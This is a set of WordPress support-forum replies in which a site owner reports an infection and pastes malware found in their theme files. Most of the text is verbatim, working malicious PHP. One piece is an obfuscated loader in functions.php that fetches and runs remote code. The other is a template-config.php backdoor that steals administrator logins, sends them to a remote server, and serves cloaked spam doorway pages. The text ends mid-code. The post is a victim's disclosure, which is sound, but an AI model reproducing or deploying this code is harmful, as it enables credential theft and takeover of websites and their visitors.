thedoc40tt
Forum Replies Created
Viewing 11 replies - 1 through 11 (of 11 total)
-
Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16It appears to not be injected into the DB, I never found anything in the SQL that matched the parameters.
I had to do a manual search through all the sites and template files to find the damage, the js was just in one site ‘main’ folder
Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16and from my functions.php file
@ini_set('display_errors', '0'); error_reporting(0); global $zeeta; if (!$npDcheckClassBgp && !isset($zeeta)) { $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrLIgbQwO4ZdBZv2dPRfXN70cmCWIX7HVoQ=="; if (!function_exists('get_data_ya')) { if (ini_get('allow_url_fopen')) { function get_data_ya($m) { $data = file_get_contents($m); return $data; } } else { function get_data_ya($m) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $m); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } } if (!function_exists('wp_cd')) { function wp_cd($fd, $fa="") { $fe = "wp_frmfunct"; $len = strlen($fd); $ff = ''; $n = $len>100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, "<?php\n$mtchs[1]\n?>"); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; $zeeta = "yup"; }Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16more infomation, this info was in my template-config.php file and was not detected by the scanner
$admworkurl=""; ini_set('display_errors',"Off");ini_set('memory_limit','256M');ini_set('max_execution_time',0);set_time_limit(0);ignore_user_abort(1);$wpdbhost=DB_HOST;$wpdbhost=trim($wpdbhost,":");$wpdbname=DB_NAME;$wpdbuser=DB_USER;$wpdbpass=DB_PASSWORD;if(empty($table_prefix)){$wpdbpref="wpr_";}else{$wpdbpref=$table_prefix;}$maintablaname=$wpdbpref ."pcachewpr";$linkstablaname=$wpdbpref ."lcachewpr";$dbprt="3306";if(stripos("qqq" .$wpdbhost,":")){$wpdbhost=explode(":",$wpdbhost);$dbprt=$wpdbhost[1];$wpdbhost=$wpdbhost[0];}if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];}elseif(!empty($_SERVER['REMOTE_ADDR'])){$ip=$_SERVER['REMOTE_ADDR'];}else{$ip="";}$mordaurl=readValueFromBD($wpdbpref ."options","option_value","option_name='siteurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($mordaurl)|| $mordaurl=="no"|| stripos("qqq" .$mordaurl,"localhost")){$mordaurl=$_SERVER['HTTP_HOST'];if(is_ssl()=== false){$mordaurl="https://" .$mordaurl;}else{$mordaurl="https://" .$mordaurl;}}$currenturl=$_SERVER['SERVER_NAME'] .strtolower($_SERVER['REQUEST_URI']);$currenturl=trim($currenturl,"/");if(is_ssl()=== false){$currenturl="https://" .$currenturl;}else{$currenturl="https://" .$currenturl;}$checktable=mysqlTableSeekWP($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($admworkurl)&& is_writable(__FILE__)&& $checktable == "no"){$fp1=fopen(__FILE__ ."temp",'w+');if(!$fp1===false){fclose($fp1);$admurltodelete=$admworkurl;$admworkurl=decodeservurl($admworkurl);$params="autoknock=yes&siteurl=" .urlencode($mordaurl);$result=httpPost($admworkurl,$params);$clfile=file_get_contents(__FILE__);$clfile=str_ireplace($admurltodelete,"",$clfile);$fp=fopen(__FILE__,'w+');fwrite($fp,$clfile);fclose($fp);@unlink(__FILE__ ."temp");}}if(!empty($_POST["log"])&&!empty($_POST["pwd"])&& function_exists("wp_authenticate")){$checktable=mysqlTableSeekWP($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($checktable != "no"){$admurlfmbd=readValueFromBD($maintablaname,"wpcache","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$admurlfmbd=urldecode($admurlfmbd);$clientidfmbd=readValueFromBD($maintablaname,"wpcache","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($admurlfmbd)&&!empty($clientidfmbd)&& $clientidfmbd!="no"&& $admurlfmbd!="no"){$un=$_POST["log"];$up=$_POST["pwd"];$auth=wp_authenticate($un,$up);$auth=(array)$auth;if(!empty($auth["ID"])){if(isset($auth["roles"][0])&& $auth["roles"][0]== "administrator"){if(isset($auth["allcaps"]["level_10"])&& $auth["allcaps"]["level_10"]=== true){$params="clientid=" .$clientidfmbd ."&updata=" .urlencode($un ."|||" .$up) ."&admip=" .urlencode($ip) ."&admurl=" .urlencode($currenturl);$result=httpPost($admurlfmbd,$params);}}}}}}if(empty($_GET['ertthndxbcvs'])&&!stripos("qqq" .$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI'],"/admin")&&!stripos("qqq" .$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI'],"wp-admin")&&!empty($wpdbhost)&&!empty($wpdbname)&&!empty($wpdbuser)&&!empty($wpdbpass)){header('Content-type: text/html; charset=UTF-8');$currenthash=md5($currenturl);if(!empty($_SERVER['HTTP_USER_AGENT'])){$useragent=$_SERVER['HTTP_USER_AGENT'];}else{$useragent="";}if(!empty($_SERVER['HTTP_REFERER'])){$referer=$_SERVER['HTTP_REFERER'];}else{$referer="";}if(!empty($_POST["trsgdfs"])&& $_POST["trsgdfs"]== "1sxhlichvls"&&!empty($_POST["qwydsdf"])){$err="";$checktable=mysqlTableSeekWP($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($checktable == "no"){$res=createTable($maintablaname,"wphash LONGBLOB, wpurl LONGBLOB, wpcache LONGBLOB, wpk LONGBLOB, wpk1 LONGBLOB, wpset LONGBLOB, wpred LONGBLOB, wpredurl LONGBLOB","id",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($res != "yes"){echo $res;die();}}elseif($checktable=="udfgoihdkh48sied"){echo $checktable;die();}elseif($checktable=="yes"){echo "aawtr35tdgvvcsxdff";die();}$checktable=mysqlTableSeekWP($linkstablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($checktable== "no"){$res=createTable($linkstablaname,"wphash LONGBLOB, wpcache LONGBLOB","id",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($res != "yes"){echo $res;die();}}elseif($checktable=="udfgoihdkh48sied"){echo $checktable;die();}elseif($checktable=="yes"){echo "aawtr35tdgvvcsxdff";die();}createIndexBWD($maintablaname,"wphash",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);createIndexBWD($linkstablaname,"wphash",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$postpass=randString("15");$res=insertToBD($maintablaname,"wphash, wpcache","'admurl', '" .urlencode($_POST["qwydsdf"]) ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$res=insertToBD($maintablaname,"wphash, wpcache","'passtopost', '" .$postpass ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$clientid=randString("20");$res=insertToBD($maintablaname,"wphash, wpcache","'clientid', '" .$clientid ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($res == "yes"){echo "zxcvetrhytdj65re|||||" .$postpass .":::::" .$clientid ."|||||";if(function_exists('delete_metadata')){delete_metadata('user',0,'session_tokens',false,true);}die();}else{echo "xcvbrhr6hdhcgxcva";die();}}if(!empty($_POST["ptpxcbeiru"])){$passtopostfmbd=readValueFromBD($maintablaname,"wpcache","wphash='passtopost'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$admurlfmbd=readValueFromBD($maintablaname,"wpcache","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$clientidfmbd=readValueFromBD($maintablaname,"wpcache","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($passtopostfmbd)|| $passtopostfmbd == "no"|| $passtopostfmbd != $_POST["ptpxcbeiru"]){echo "uewea4sfdxcbxb";die();}if(empty($admurlfmbd)|| $admurlfmbd == "no"){echo "kutyre54aw3eafd";die();}if(empty($clientidfmbd)|| $clientidfmbd == "no"){echo "xgse5rsdgiofsdsf";die();}$admurlfmbd=urldecode($admurlfmbd);if(!empty($_POST["hdfgfxoi"])&& $_POST["hdfgfxoi"]== "ncxfxdasdf"&&!empty($_POST["chpuview"])&&!empty($_POST["doorkeys"])){if(getCountofTable($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt)>3 && $_POST["firstpart"]=="yes"){deleteLinesFmDB($maintablaname,"wpk IS NOT NULL",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);deleteLinesFmDB($linkstablaname,"wphash IS NOT NULL",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpred","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpredurl","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpred","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}$chpuview=$_POST["chpuview"];$chpuview=urldecode($chpuview);$doorkeys=$_POST["doorkeys"];$doorkeys=urldecode($doorkeys);$doorkeys=stripslashes($doorkeys);$doorkeys=preg_replace_callback('!s:(\d+):"(.*?)";!',function($match){return($match[1]==($match[2]))?$match[0]:'s:' .strlen($match[2]) .':"' .$match[2] .'";';},$doorkeys);$doorkeys=unserialize($doorkeys);if(!is_array($doorkeys)|| count($doorkeys)== 0){echo "vbsdreawefzzdfv";die();}if($_POST["firstpart"]=="yes"){$sitetempfrdoor=parseTemplate();if(empty($sitetempfrdoor)||!is_array($sitetempfrdoor)|| empty($sitetempfrdoor["sitetemp"])|| empty($sitetempfrdoor["chpu"])){echo "ktdrtsdfgsdfs4tse";die();}$chpufrdoor=$sitetempfrdoor["chpu"];$sitetempfrdoor=$sitetempfrdoor["sitetemp"];$sitetempfrdoor=str_ireplace("xmlrpc.php","",$sitetempfrdoor);updateBDData($maintablaname,urlencode($chpufrdoor),"wpurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}else{$chpufrdoor=readValueFromBD($maintablaname,"wpurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$chpufrdoor=urldecode($chpufrdoor);$sitetempfrdoor="notfirstpart";if(empty($chpufrdoor)|| $chpufrdoor=="no"){echo "kiryut7dfgzxvcmcxz";die();}}$doorpagesdata=array();$testpageurl="";foreach($doorkeys as $k=>$onekey){$onekey=explode("|",$onekey);if(!empty($onekey[1])){$key_1=$onekey[1];}else{$key_1="";}$onekey=$onekey[0];if($chpuview == "k"){$slugfrurl=sanitize_title($onekey);}elseif($chpuview == "g"){$slugfrurl=randString(rand(7,11));}elseif($chpuview == "n"){$slugfrurl=rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9) .rand(1,9);}$slugfrurl=strtolower($slugfrurl);$doorpageurl=str_ireplace("chpukeyplace",$slugfrurl,$chpufrdoor);$doorpagesdata[]=$onekey .":::::" .$doorpageurl;$res=insertToBD($maintablaname,"wphash, wpurl, wpk, wpk1","'" .md5($doorpageurl) ."', '" .urlencode($doorpageurl) ."', '" .urlencode($onekey) ."', '" .urlencode($key_1) ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($_POST["firstpart"]=="yes"&& $k==0){$testpageurl=str_ireplace("chpukeyplace","edf8329we",$chpufrdoor);insertToBD($maintablaname,"wphash, wpurl, wpk, wpk1","'" .md5($testpageurl) ."', '" .urlencode($testpageurl) ."', 'edf8329we', ''",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}if($res == "bewiursfer9uidd"){echo "xcvbr459isdfgssdd";die();}}updateBDData($maintablaname,$_POST["doorsetts"],"wpset","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$doorpagesdata=serialize($doorpagesdata);$doorpagesdata=urlencode($doorpagesdata);$params="clientid=" .$clientidfmbd ."&newdoordata=" .$doorpagesdata ."&sitetemplate=" .urlencode($sitetempfrdoor) ."&firstpart=" .$_POST["firstpart"] ."&testpageurl=" .urlencode($testpageurl);$result=httpPost($admurlfmbd,$params);if(stripos("qqq" .$result,"trugsew9rusxildd")){echo "xbvstrei4w0aeaorpdf";die();}elseif(stripos("qqq" .$result,"bw543ersfdgsdfffg")){echo "pqweity5rer5syc9f";die();}else{echo "myrtersgertsrgfdf";die();}}if(!empty($_POST["redircode"])||!empty($_POST["redirurl"])){if(!empty($_POST["redircode"])){if($_POST["redircode"]=="stop"){updateBDData($maintablaname,"","wpred","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);updateBDData($maintablaname,"","wpredurl","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}else{updateBDData($maintablaname,urlencode(stripslashes($_POST["redircode"])),"wpred","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}if(!empty($_POST["redirurl"])){updateBDData($maintablaname,urlencode(stripslashes($_POST["redirurl"])),"wpredurl","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}echo "geri9rdgfojvrev";die();}if(!empty($_POST["clearcache"])){updateBDData($maintablaname,"","wpcache","wpcache IS NOT NULL AND wpk IS NOT NULL",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);deleteLinesFmDB($linkstablaname,"wphash IS NOT NULL",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);echo "be545hgfxbfbgfdf";die();}if(!empty($_POST["editownlinks"])&&!empty($_POST["newownlinks"])){$doorsettings=readValueFromBD($maintablaname,"wpset","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($doorsettings)&& $doorsettings!="no"){$doorsettings=urldecode($doorsettings);$doorsettings=unserialize($doorsettings);$doorsettings["ownlinks"]=$_POST["newownlinks"];$doorsettings=serialize($doorsettings);$doorsettings=urlencode($doorsettings);updateBDData($maintablaname,$doorsettings,"wpset","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);echo "nbvw436rudtydsjjgk";die();}else{echo "vcbntrs6udtyradgxf";die();}}if(!empty($_POST["getdoorstatus"])){$doorstatus=getStatus($maintablaname,$linkstablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$botsstats=readValueFromBD($maintablaname,"wpred","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!is_numeric($botsstats)){$botsstats=0;}$usersstats=readValueFromBD($maintablaname,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!is_numeric($usersstats)){$usersstats=0;}if(is_array($doorstatus)){$doorstatus["botsstats"]=$botsstats;$doorstatus["usersstats"]=$usersstats;$doorstatus=serialize($doorstatus);$doorstatus=urlencode($doorstatus);echo "p9ot78u6syrtfxhg DOORSTATUS:::" .$doorstatus .":::DOORSTATUSq";die();}else{echo $doorstatus ."<br>";echo "zxcveer4eefresfsdfv";die();}}}$uatobadfilter=array('#Ask\s*Jeeves#i','#HP\s*Web\s*PrintSmart#i','#HTTrack#i','#IDBot#i','#Indy\s*Library#','#ListChecker#i','#MSIECrawler#i','#NetCache#i','#Nutch#i','#RPT-HTTPClient#i','#rulinki\.ru#i','#Twiceler#i','#WebAlta#i','#Webster\s*Pro#i','#www\.cys\.ru#i','#Wysigot#i','#Ahrefs#i','#Yeti#i','#Accoona#i','#CazoodleBot#i','#CFNetwork#i','#ConveraCrawler#i','#DISCo#i','#Download\s*Master#i','#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i','#Gigabot#i','#HTMLParser#i','#ia_archiver#i','#ichiro#i','#IRLbot#i','#Java#i','#km\.ru\s*bot#i','#kmSearchBot#i','#libwww-perl#i','#Lupa\.ru#i','#LWP::Simple#i','#lwp-trivial#i','#Missigua#i','#MJ12bot#i','#Offline\s*Explorer#i','#OmniExplorer_Bot#i','#PEAR#i','#psbot#i','#Python#i','#rulinki\.ru#i','#SMILE#i','#Speedy#i','#Teleport\s*Pro#i','#TurtleScanner#i','#User-Agent#i','#voyager#i','#Webalta#i','#WebCopier#i','#WebData#i','#WebZIP#i','#Wget#i','#Yanga#i','#Yeti#i','#jeeves#i','#WordPress#i','#scooter#i','#av\s*fetch#i','#asterias#i','#spiderthread\srevision#i','#sqworm#i','#infoseek sidewinder#i','#ultraseek#i','#polybot#i','#webcrawler#i','#robozill#i','#gulliver#i','#architextspider#i','#charlotte#i','#Vegi\s*bot#i','#BUbiNG#i','#ltx71#i','#MJ12bot#i','#MegaIndex#i','#Mediatoolkitbot#i','#DotBot#i','#opensiteexplorer#i','#Go-http-client#i','#Photon#i','#bloglovin#i','#scalaj-http#i','#AddThis#i','#LinkWalker#i','#adscanner#i','#istellabot#i','#Datanyze#i');$badbot="";if(strpos("qqq" .preg_replace($uatobadfilter,'-ABOT-',$useragent),'-ABOT-')){$badbot="yes";}if(mysqlTableSeekWP($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt)!="no"&& getCountofTable($maintablaname,$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt)>3 &&!stripos("qqq" .$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI'],"wp-login")&& is_user_logged_in()===false && empty($badbot)){$reddata=readValueFromBD($maintablaname,"wpred, wpredurl","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$redcode="";$redurl="";if(!empty($reddata)&& $reddata != "no"){$redcode=$reddata["wpred"];$redurl=$reddata["wpredurl"];}$currentdoorcache=readValueFromBD($maintablaname,"wpcache, wpk","wphash='" .$currenthash ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($currentdoorcache == "no"){$showlinksornot="no";$doorsettings=readValueFromBD($maintablaname,"wpset","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($doorsettings)&& $doorsettings!="no"){$doorsettings=urldecode($doorsettings);$doorsettings=unserialize($doorsettings);$showlinksornot=$doorsettings["ownlinks"];}if($showlinksornot=="yes"){$currentlinkscache=readValueFromBD($linkstablaname,"wpcache","wphash='" .$currenthash ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if($currentlinkscache == "no"|| empty($currentlinkscache)){$randlinks=randomValuesFromTableById($maintablaname,"wpurl,wpk",rand(4,6),$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($randlinks)&& $randlinks != "no"&& is_array($randlinks)){$goodlinks=array();foreach($randlinks as $onelinkdata){if(!empty($onelinkdata["wpk"])){$goodlinks[]="<a href=\"" .trim(urldecode($onelinkdata["wpurl"])) ."\">" .trim(urldecode($onelinkdata["wpk"])) ."</a>";}}if(count($goodlinks)>0){$goodlinks=implode(" ",$goodlinks);insertToBD($linkstablaname,"wphash, wpcache","'" .$currenthash ."', '" .urlencode($goodlinks) ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}else{$goodlinks="";}}}else{$goodlinks=urldecode($currentlinkscache);}if(!empty($goodlinks)){$bot="";if($redcode == "ktapi"&&!empty($redurl)){$redurl=urldecode($redurl);$redurl=unserialize($redurl);if(count($redurl)== 3){$bot=goToRedirect($ip,$referer,$useragent,$redurl["kturl"],"",$redurl["lapi"],"yes","","","","");}}else{$bot=goToRedirect($ip,$referer,$useragent,"","","","yes","","","","");}if($bot == "bot"){$selfpage=placeLinks($currenturl,$goodlinks);if(!empty($selfpage)){echo $selfpage;die();}}}}}else{$clientidfmbd=readValueFromBD($maintablaname,"wpcache","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);$admurlfmbd=readValueFromBD($maintablaname,"wpcache","wphash='admurl'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(!empty($clientidfmbd)&&!empty($admurlfmbd)){$admurlfmbd=urldecode($admurlfmbd);$currentkey=$currentdoorcache["wpk"];$key1frredir=readValueFromBD($maintablaname,"wpk1","wphash='" .$currenthash ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($key1frredir)|| $key1frredir=="no"){$key1frredir="";}$redresult="";if($redcode == "ktapi"&&!empty($redurl)){$redurl=urldecode($redurl);$redurl=unserialize($redurl);if(count($redurl)== 3){$redresult=goToRedirect($ip,$referer,$useragent,$redurl["kturl"],$currenturl,$redurl["mapi"],"",urldecode($currentkey),"","",$key1frredir);}}elseif(empty($redcode)){$redresult=goToRedirect($ip,$referer,$useragent,"",$currenturl,"","",urldecode($currentkey),"","","");}else{$redcode=urldecode($redcode);$redurl=urldecode($redurl);$redresult=goToRedirect($ip,$referer,$useragent,"",$currenturl,"","",urldecode($currentkey),$redcode,$redurl,$key1frredir);}if(empty($currentdoorcache["wpcache"])|| $currentkey=="edf8329we"){$params="clientid=" .$clientidfmbd ."&givemecontent=" .$currentkey;$content=httpPost($admurlfmbd,$params);if(!empty($content)&& strlen($content)>1000){$content=urlencode($content);if($currentkey!="edf8329we"){updateBDData($maintablaname,$content,"wpcache","wphash='" .$currenthash ."'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}}else{$content=$currentdoorcache["wpcache"];}if($redresult == "bot"){if(stripos("qqq" .$useragent,"google")|| stripos("qqq" .$useragent,"bing")|| stripos("qqq" .$useragent,"yahoo")|| stripos("qqq" .$useragent,"yandex")){$botscount=readValueFromBD($maintablaname,"wpred","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($botscount)|| $botscount=="no"){$botscount=1;}elseif(is_numeric($botscount)){$botscount++;}else{$botscount=1;}if(!empty($botscount)){updateBDData($maintablaname,$botscount,"wpred","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}echo urldecode($content);die();}elseif(!empty($redresult)){if(stripos("qqq" .$referer,"google.")|| stripos("qqq" .$referer,"yahoo.")|| stripos("qqq" .$referer,"bing.")|| stripos("qqq" .$referer,"yandex.ru")|| stripos("qqq" .$referer,"mail.ru")){$userscount=readValueFromBD($maintablaname,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($userscount)|| $userscount == "no"){$userscount=1;}elseif(is_numeric($userscount)){$userscount++;}else{$userscount=1;}if(!empty($userscount)){updateBDData($maintablaname,$userscount,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}echo $redresult;die();}elseif(empty($redresult)){if(stripos("qqq" .$referer,"google.")|| stripos("qqq" .$referer,"yahoo.")|| stripos("qqq" .$referer,"bing.")|| stripos("qqq" .$referer,"yandex.ru")|| stripos("qqq" .$referer,"mail.ru")){$userscount=readValueFromBD($maintablaname,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);if(empty($userscount)|| $userscount == "no"){$userscount=1;}else{$userscount++;}if(!empty($userscount)){updateBDData($maintablaname,$userscount,"wpredurl","wphash='clientid'",$wpdbhost,$wpdbname,$wpdbuser,$wpdbpass,$dbprt);}}}}}}}function decodeservurl($servurl){$goodservurl=array();foreach(str_split($servurl)as $onechar){if(is_numeric($onechar)){if($onechar>=7){$onechar=$onechar-7;}else{$onechar=$onechar+10-7;}}$goodservurl[]=$onechar;}return urldecode(base64_decode(implode($goodservurl)));}function createIndexBWD($tablename,$indcol,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}$sql="ALTER TABLE " .$tablename ." ADD INDEX " .$indcol ." (" .$indcol ."(5))";if(mysqli_query($dbcon,$sql)){mysqli_close($dbcon);return "yes";}else{mysqli_close($dbcon);return "orutydrfsxgxcvbxcv";}}function getStatus($mtablename,$ltablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$checkdata=array();$checkmaintable=mysqlTableSeekWP($mtablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport);if(!empty($checkmaintable)&& $checkmaintable != "no"){$checkdata["maintable"]="good";$linescount=getCountofTable($mtablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport);if($linescount!="no"&& $linescount>3){$checkdata["cachelines"]=$linescount-3;$cachecount=getCacheCount($mtablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport);if($cachecount!="no"&& $cachecount!="bad"){$checkdata["cachecount"]=$cachecount;}else{$checkdata["cachecount"]="bad";}}else{$checkdata["cachelines"]="bad";$checkdata["cachecount"]="bad";}}else{$checkdata["maintable"]="bad";$checkdata["cachecount"]="bad";}$checklinktable=mysqlTableSeekWP($ltablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport);if(!empty($checklinktable)&& $checklinktable != "no"){$checkdata["linkable"]="good";}else{$checkdata["linkable"]="bad";}return $checkdata;}function getCacheCount($tablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="SELECT COUNT(1) FROM " .$tablename ." WHERE wpcache IS NOT NULL AND wpcache!='' AND wpk IS NOT NULL";$needvalue=mysqli_query($dbcon,$sql);$needvalue=mysqli_fetch_all($needvalue);mysqli_close($dbcon);if(count($needvalue[0])>0){return $needvalue[0][0];}else{return "bad";}}}function goToRedirect($ip,$referrer,$ua,$domain_kt,$url_curr,$apiToken,$forlinks,$keyword,$plainred,$plainredurl,$key1){if(empty($ip)){return "";}if(!empty($apiToken)){$user_agent_to_filter=array('#Ask\s*Jeeves#i','#HP\s*Web\s*PrintSmart#i','#HTTrack#i','#IDBot#i','#Indy\s*Library#','#ListChecker#i','#MSIECrawler#i','#NetCache#i','#Nutch#i','#RPT-HTTPClient#i','#rulinki\.ru#i','#Twiceler#i','#WebAlta#i','#Webster\s*Pro#i','#www\.cys\.ru#i','#Wysigot#i','#Ahrefs#i','#Yeti#i','#Accoona#i','#CazoodleBot#i','#CFNetwork#i','#ConveraCrawler#i','#DISCo#i','#Download\s*Master#i','#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i','#Gigabot#i','#HTMLParser#i','#ia_archiver#i','#ichiro#i','#IRLbot#i','#Java#i','#km\.ru\s*bot#i','#kmSearchBot#i','#libwww-perl#i','#Lupa\.ru#i','#LWP::Simple#i','#lwp-trivial#i','#Missigua#i','#MJ12bot#i','#msnbot#i','#Offline\s*Explorer#i','#OmniExplorer_Bot#i','#PEAR#i','#psbot#i','#Python#i','#rulinki\.ru#i','#SMILE#i','#Speedy#i','#Teleport\s*Pro#i','#TurtleScanner#i','#User-Agent#i','#voyager#i','#Webalta#i','#WebCopier#i','#WebData#i','#WebZIP#i','#Wget#i','#Yanga#i','#Yeti#i','#MJ12bot#i','#jeeves#i','#WordPress#i','#scooter#i','#av\s*fetch#i','#asterias#i','#spiderthread revision#i','#sqworm#i','#ask#i','#lycos.spider#i','#infoseek sidewinder#i','#ultraseek#i','#polybot#i','#webcrawler#i','#robozill#i','#gulliver#i','#architextspider#i','#charlotte#i','#Vegi\s*bot#i','#BUbiNG#i','#ltx71#i','#YandexBot#i','#MJ12bot#i','#MegaIndex#i','#DotBot#i');if(strpos("qqq" .preg_replace($user_agent_to_filter,'-ANGRYBOT-',$ua),'-ANGRYBOT-')){return "bot";}$lang=$_SERVER['HTTP_ACCEPT_LANGUAGE'];$ua=urlencode($ua);$url=$domain_kt ."?is_api=1&source=" .urlencode($url_curr) ."&action=get&token=" .$apiToken ."&ua=" .$ua ."&ip=" .$ip ."&keyword=" .urlencode($keyword) 